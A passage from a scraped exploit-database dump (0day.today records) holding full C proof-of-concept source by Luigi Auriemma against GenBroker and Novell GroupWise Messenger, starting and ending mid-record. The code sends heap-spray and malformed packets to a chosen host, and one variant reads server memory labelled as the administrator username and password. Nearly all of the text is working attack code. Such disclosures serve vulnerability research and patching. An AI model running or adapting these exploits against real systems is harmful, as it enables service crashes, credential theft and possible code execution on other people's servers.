0x4b0;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 4: {\r\n type = 0x4b2;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 5: {\r\n type = 0x4b5;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 6: {\r\n type = 0x7d0;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 7: {\r\n type = 0xDAE;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 8: {\r\n type = 0xfa4;\r\n p += putxx(p, 0x20000001, 32);\r\n break;\r\n }\r\n case 9: {\r\n type = 0xfa7;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 10: {\r\n type = 0x1bbc;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 11: {\r\n type = 0x1c84;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x10000001, 32);\r\n break;\r\n }\r\n case 12: {\r\n type = 0x26AC;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n default: {\r\n printf(\"\\nError: invalid bug number %d\\n\", bug);\r\n exit(1);\r\n break;\r\n }\r\n }\r\n\r\n p += putcc(p, 0x41, BUFFSZ - (p - buff)); // good as string size too\r\n // send_gen automatically adjusts the size to 0x1ff4\r\n\r\n // the following part is not needed so can be removed\r\n printf(\"- heap spray packets: \");\r\n fill = malloc(BUFFSZ);\r\n if(!fill) std_err();\r\n f = fill;\r\n f += putxx(f, 340, 32);\r\n f += putss(f, \"parameter\");\r\n f += putss(f, \"value\");\r\n for(i = 0; i < 340; i++) {\r\n f += putss(f, \"AAAA\");\r\n f += putss(f, \"AAAA\");\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n }\r\n for(i = 0; i < 20; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, 0x4b2, fill, f - fill);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- malformed packets: \");\r\n for(i = 0; i < 10; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, type, buff, p - buff);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- done\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz) {\r\n static u8 buff[BUFFSZ];\r\n static int pck = 1;\r\n int t;\r\n u8 *p;\r\n\r\n t = 4 + 4 + 4 + datasz;\r\n if(t > (BUFFSZ - 12)) t = BUFFSZ - 12;\r\n\r\n p = buff;\r\n p += putxx(p, 1, 16);\r\n p += putxx(p, htons(pck++), 16);\r\n p += putxx(p, htonl(1), 32);\r\n p += putxx(p, htonl(t), 32);\r\n\r\n p += putxx(p, 1, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, type, 32);\r\n if(datasz > 0) p += putmm(p, data, datasz);\r\n\r\n if(send(sd, buff, p - buff, 0) < 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint putss(u8 *data, u8 *str) {\r\n int len;\r\n u8 *p;\r\n\r\n len = 0;\r\n if(str) len = strlen(str);\r\n\r\n p = data;\r\n if(len < 0xff) {\r\n p += putxx(p, len, 8);\r\n } else {\r\n p += putxx(p, 0xff, 8);\r\n p += putxx(p, len, 16);\r\n }\r\n p += putmm(p, str, len);\r\n return(p - data);\r\n}\r\n\r\n\r\n\r\nint putmm(u8 *data, u8 *str, int size) {\r\n if(size < 0) size = strlen(str);\r\n memcpy(data, str, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putcc(u8 *data, int chr, int size) {\r\n memset(data, chr, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n //data[i] = num >> ((bytes - 1 - i) << 3);\r\n data[i] = num >> (i << 3);\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18889"}, {"lastseen": "2018-01-10T19:05:29", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 2, "reporter": "Luigi Auriemma", "published": "2012-07-01T00:00:00", "title": "GenBroker <= 9.21.201.01 multiple memory free vulnerabilities", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-10T19:05:29", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-07-01T00:00:00", "id": "1337DAY-ID-18890", "href": "https://0day.today/exploit/description/18890", "sourceData": "--------\r\nwinerr.h\r\n--------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n-----------\r\ngenesis_1.c\r\n-----------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 38080\r\n#define BUFFSZ 0x2000 // 0x4000 is the max but 0x2000 seems more compatible\r\n#define ELEMENTS 0xfff\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz);\r\nint putss(u8 *data, u8 *str);\r\nint putmm(u8 *data, u8 *str, int size);\r\nint putcc(u8 *data, int chr, int size);\r\nint putxx(u8 *data, u32 num, int bits);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct linger ling = {1,1};\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n bug,\r\n type;\r\n u16 port = PORT;\r\n u8 *host,\r\n *buff,\r\n *fill,\r\n *p,\r\n *f;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"GenBroker <= 9.21.201.01 multiple memory free vulnerabilities \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <bug> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Bugs:\\n\"\r\n \" refer to the relative advisory for the available numbers\\n\"\r\n \" and what vulnerabilities they test\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n bug = atoi(argv[1]);\r\n host = argv[2];\r\n if(argc > 3) port = atoi(argv[3]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\", inet_ntoa(peer.sin_addr), port);\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n p = buff;\r\n switch(bug) {\r\n case 1: {\r\n type = 0x4b0;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32); // elements of the first array (numbers)\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, ELEMENTS, 32); // elements of the second array (strings)\r\n p += putxx(p, ELEMENTS, 32); // elements of the third array (strings\r\n break;\r\n }\r\n case 2: {\r\n type = 0x4b2;\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n case 3: {\r\n type = 0x4b5;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n case 4: {\r\n type = 0xDAE;\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n case 5: {\r\n type = 0x1bbc;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n default: {\r\n printf(\"\\nError: invalid bug number %d\\n\", bug);\r\n exit(1);\r\n break;\r\n }\r\n }\r\n\r\n // for this type of attack the data must be supplied before\r\n // the malformed packet so the following is useless\r\n //p += putcc(p, 0x41, BUFFSZ - (p - buff)); // good as string size too\r\n // send_gen automatically adjusts the size to 0x1ff4\r\n\r\n printf(\"- heap spray packets: \");\r\n fill = malloc(BUFFSZ);\r\n if(!fill) std_err();\r\n f = fill;\r\n f += putxx(f, 340, 32);\r\n f += putss(f, \"parameter\");\r\n f += putss(f, \"value\");\r\n for(i = 0; i < 340; i++) {\r\n f += putss(f, \"AAAA\");\r\n f += putss(f, \"AAAA\");\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n }\r\n for(i = 0; i < 20; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, 0x4b2, fill, f - fill);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- malformed packets: \");\r\n for(i = 0; i < 10; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, type, buff, p - buff);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- done\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz) {\r\n static u8 buff[BUFFSZ];\r\n static int pck = 1;\r\n int t;\r\n u8 *p;\r\n\r\n t = 4 + 4 + 4 + datasz;\r\n if(t > (BUFFSZ - 12)) t = BUFFSZ - 12;\r\n\r\n p = buff;\r\n p += putxx(p, 1, 16);\r\n p += putxx(p, htons(pck++), 16);\r\n p += putxx(p, htonl(1), 32);\r\n p += putxx(p, htonl(t), 32);\r\n\r\n p += putxx(p, 1, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, type, 32);\r\n if(datasz > 0) p += putmm(p, data, datasz);\r\n\r\n if(send(sd, buff, p - buff, 0) < 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint putss(u8 *data, u8 *str) {\r\n int len;\r\n u8 *p;\r\n\r\n len = 0;\r\n if(str) len = strlen(str);\r\n\r\n p = data;\r\n if(len < 0xff) {\r\n p += putxx(p, len, 8);\r\n } else {\r\n p += putxx(p, 0xff, 8);\r\n p += putxx(p, len, 16);\r\n }\r\n p += putmm(p, str, len);\r\n return(p - data);\r\n}\r\n\r\n\r\n\r\nint putmm(u8 *data, u8 *str, int size) {\r\n if(size < 0) size = strlen(str);\r\n memcpy(data, str, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putcc(u8 *data, int chr, int size) {\r\n memset(data, chr, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n //data[i] = num >> ((bytes - 1 - i) << 3);\r\n data[i] = num >> (i << 3);\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18890"}, {"lastseen": "2018-01-05T01:23:48", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 2, "reporter": "Luigi Auriemma", "published": "2012-07-01T00:00:00", "title": "Novell GroupWise Messenger <= 2.1.0 DoS", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-05T01:23:48", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P/", "value": 6.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-07-01T00:00:00", "id": "1337DAY-ID-18885", "href": "https://0day.today/exploit/description/18885", "sourceData": "winerr.h\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n\r\n----------\r\n\r\nnmma_x.c\r\n\r\n----------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <stdarg.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 8300\r\n#define BUFFSZ 8192 // the server doesn't handle more than this\r\n#define MAXSZ 0xff0 // the server doesn't handle more than this\r\n\r\n#define BOFCHR 0x41414141\r\n#define BUG2a 0x00560224\r\n#define BUG2b 0x00560324\r\n\r\n\r\n\r\nint tcp_recv(int sd, u8 *buff, int size);\r\nint recv_gwm(int sd);\r\nint send_gwm(int sd, u8 *cmd, ...);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct linger ling = {1,1};\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n bug;\r\n u16 port = PORT;\r\n u8 tmp[32],\r\n *host;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Vulnerabilities in Novell GroupWise Messenger <= 2.1.0 \" VER \"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <bug> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Bugs:\\n\"\r\n \" refer to the relative advisories for the available numbers\\n\"\r\n \" and what vulnerabilities they test\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n bug = atoi(argv[1]);\r\n host = argv[2];\r\n if(argc > 3) port = atoi(argv[3]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));\r\n\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n\r\n if(bug == 0) {\r\n // lame DoS only\r\n send_gwm(sd, \"login\",\r\n \"NM_A_SZ_TRANSACTION_ID\", 8, BOFCHR,\r\n NULL, -1, NULL);\r\n\r\n } else if(bug == 1) {\r\n send_gwm(sd, \"login\",\r\n \"NM_A_PARM1\", 12, BOFCHR,\r\n NULL, -1, NULL);\r\n\r\n } else if(bug == 2) {\r\n printf(\"- read memory at offset 0x%08x (administrator FDN username):\\n\", BUG2a);\r\n send_gwm(sd, \"getdetails\",\r\n \"NM_A_SZ_DN\", 8, BUG2a,\r\n NULL, -1, NULL);\r\n\r\n printf(\"- read memory at offset 0x%08x (administrator password):\\n\", BUG2b);\r\n send_gwm(sd, \"getdetails\",\r\n \"NM_A_SZ_DN\", 8, BUG2b,\r\n NULL, -1, NULL);\r\n\r\n } else if(bug == 3) {\r\n printf(\"- heap spray, you will get a write4 in 0x%08x\\n\", BOFCHR); \r\n for(i = 0; i < 50; i++) {\r\n send_gwm(sd, \"createsearch\",\r\n \"test\", 10, NULL, // NULL here is a string of about 4000 'a's\r\n NULL, -1, NULL);\r\n\r\n send_gwm(sd, \"createsearch\",\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n \"test\", 9, 0,\r\n NULL, -1, NULL);\r\n }\r\n\r\n printf(\r\n \"- now I need to join the Messenger server with a valid account.\\n\"\r\n \" I will use the account with username \\\"admin\\\" and password\\n\"\r\n \" \\\"adminpass\\\" so that it's not needed to create additional accounts\\n\"\r\n \" (boring operation) for verifying this vulnerability.\\n\"\r\n \" be sure to have this account on your eDirectory server.\\n\"\r\n \" press RETURN to continue the test\\n\");\r\n fgets(tmp, sizeof(tmp), stdin);\r\n\r\n send_gwm(sd, \"login\",\r\n //\"NM_A_PARM1\", 10, \"Sx6ItFwErgcmyZ62tIbi3w%3d%3d\", // blowfish of \"test::test\"\r\n \"NM_A_PARM1\", 10, \"1Bi2DNQGfH0ScFGkgDD8dVHeYP%2bt9VL7\", // blowfish of \"admin::adminpass\"\r\n \"NM_A_SZ_USER_AGENT\", 10, \"NGWMW%2f2%2e0%2e2+%28Windows+Server+2003%3b+5%2e2%29\",\r\n \"NM_A_UD_BUILD\", 8, 7,\r\n NULL, -1, NULL);\r\n\r\n send_gwm(sd, \"getattribs\",\r\n NULL, -1, NULL);\r\n\r\n send_gwm(sd, \"createsearch\",\r\n \"test\", 9, 0,\r\n NULL, -1, NULL);\r\n\r\n } else {\r\n printf(\"\\nError: invalid bug number (%d)\\n\", bug);\r\n exit(1);\r\n }\r\n\r\n//quit:\r\n close(sd);\r\n printf(\"\\n- done\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint tcp_recv(int sd, u8 *buff, int size) {\r\n int i;\r\n u8 c;\r\n\r\n for(i = 0; i < size; i++) {\r\n if(recv(sd, buff ? (buff + i) : ((void *)&c), 1, 0) <= 0) return(-1);\r\n }\r\n return(i);\r\n}\r\n\r\n\r\n\r\nint recv_gwm(int sd) {\r\n static u8 *buff = NULL;\r\n u32 len;\r\n int crlf = 0,\r\n eof = 0;\r\n u16 type;\r\n u8 c;\r\n\r\n for(;;) {\r\n len = recv(sd, (void *)&c, 1, 0);\r\n if(len <= 0) return(-1);\r\n if(c == '\\n') crlf++;\r\n if(c > '\\r') crlf = 0;\r\n if(crlf >= 2) break;\r\n }\r\n\r\n printf(\"\\n\");\r\n do {\r\n if(tcp_recv(sd, (void *)&type, 